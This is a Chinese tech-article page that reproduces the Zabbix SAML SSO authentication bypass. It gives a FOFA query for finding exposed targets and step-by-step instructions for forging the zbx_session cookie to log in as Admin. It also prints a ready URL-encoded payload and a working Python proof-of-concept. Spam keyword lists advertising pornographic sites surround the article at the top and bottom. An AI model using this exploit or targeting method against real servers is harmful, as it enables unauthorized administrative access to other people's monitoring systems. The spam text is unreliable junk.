国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

Zabbix SAML SSO 登錄繞過漏洞的操作流程

瀏覽:193日期:2023-04-06 15:09:27
目錄
  • 一、簡介
  • 二、FOFA語法
  • 三、復現流程

一、簡介

zabbix是一個基于WEB界面的提供分布式系統監視以及網絡監視功能的企業級的開源解決方案。zabbix能監視各種網絡參數,保證服務器系統的安全運營;并提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種問題。

zabbix server可以通過SNMP,zabbix agent,ping,端口監視等方法提供對遠程服務器/網絡狀態的監視,數據收集等功能,它可以運行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平臺上。

該漏洞源于在啟用 saml SSO 身份驗證(非默認)的情況下,未身份驗證的攻擊者可以修改會話數據,成功繞過前臺進入后臺,因為存儲在會話中的用戶登錄未經過驗證。

漏洞的限制條件:需要啟用 SAML 身份驗證,并且攻擊者必須知道 Zabbix 用戶的用戶名。

二、FOFA語法

app=“ZABBIX-監控系統” && body=“SAML”

三、復現流程

1、通過fofa語法搜索zabbix資產訪問首頁獲取set-cookie中zbx_session參數的值

2、通過Url解碼和Base64解碼獲得zbx_session參數Json格式數據

{"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

3、通過在Json中添加saml_data和username_attribute參數后重新Base64編碼和Url編碼構造Payload

{"saml_data":{"username_attribute":"Admin"},"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

4、把構造好的payload進行base64編碼和url編碼

%65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%6e%73%69%64%58%4e%6c%63%6d%35%68%62%57%56%66%59%58%52%30%63%6d%6c%69%64%58%52%6c%49%6a%6f%69%51%57%52%74%61%57%34%69%66%53%77%69%63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%69%4e%6a%64%6d%4e%7a%45%7a%4e%54%56%6c%59%6a%6b%32%4d%54%49%78%5a%6a%4d%34%4e%47%56%68%4d%44%55%33%4d%54%49%35%4d%47%5a%68%59%32%45%69%4c%43%4a%7a%61%57%64%75%49%6a%6f%69%56%58%6c%78%4d%6b%4a%59%55%57%5a%6c%4e%55%6c%31%5a%7a%52%56%51%6e%42%31%59%33%64%78%4d%31%42%59%51%57%31%57%61%44%42%6a%64%48%42%53%4e%48%42%32%52%57%5a%36%5a%31%77%76%54%31%64%6c%4e%31%52%4c%61%47%31%42%55%57%52%78%65%58%55%31%61%56%56%74%64%46%64%36%55%56%49%72%4d%47%30%7a%4d%32%56%52%51%6b%68%75%61%7a%46%57%56%69%74%4a%54%7a%42%70%59%30%46%52%50%54%30%69%66%51%3d%3d

5、請求index_sso.php,在http請求頭中構造payload,將zbx_session的值替換為url編碼后的payload

6、成功登錄后臺

可利用poc直接獲取構造后的payload

poc:

import requestsimport reimport urllib.parseimport base64import jsonimport sys def exp(target, username):	resp = requests.get(url=target, verify=False)	cookie = resp.headers.get("Set-Cookie")	zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)	url_decode_data = urllib.parse.unquote(zbx_session[0], encoding="utf-8")	base64_decode_data = base64.b64decode(url_decode_data)	decode_to_str = str(base64_decode_data, encoding="utf-8")	to_json = json.loads(decode_to_str)	tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])	payloadJson = json.dumps(tmp_ojb)	print("decode_payload:", payloadJson)	payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))	print("zbx_signed_session:", payload)if __name__ == "__main__":	if len(sys.argv) != 3:		print("argv error")		exit(0)	target = sys.argv[1]	username = sys.argv[2]	exp(target, username)

到此這篇關于Zabbix SAML SSO 登錄繞過漏洞的文章就介紹到這了,更多相關Zabbix 登錄繞過漏洞內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: Zabbix
主站蜘蛛池模板: 一区二区成人国产精品 | 欧美三级三级三级爽爽爽 | 999国内精品永久免费视频 | 中国一级毛片aaa片 中国一级毛片录像 | 欧美亚洲综合另类在线观看 | 日韩午夜免费视频 | 亚洲 欧美 成人日韩 | 国产国语对白一级毛片 | 亚欧色视频在线观看免费 | 国产精品国产精品国产三级普 | 一男一女搞黄 | 免费一级毛片在线播放 | 青青影院一区二区免费视频 | 国产精品久久久久久久免费大片 | 一区二区三区精品视频 | 67194国产精品 | 加勒比综合网 | 美女毛片儿 | 午夜日本一区二区三区 | 性刺激免费视频观看在线观看 | 91国内精品久久久久怡红院 | 午夜影院黄色片 | 成人精品视频在线 | 久久高清精品 | 久久精品视频免费播放 | 国产视频高清在线 | 久久综合婷婷香五月 | 国产乱淫a∨片免费视频 | 国产午夜精品不卡视频 | 国产在线欧美精品 | 亚洲不卡在线观看 | 亚洲自拍另类 | 欧美日韩中文一区二区三区 | 国产在线精品观看 | 免费看成人www的网站软件 | 最新黄网 | 高清不卡毛片 | 国产精品特级毛片一区二区三区 | 国产九九在线观看播放 | 欧美精品成人久久网站 | 在线播放国产一区二区三区 |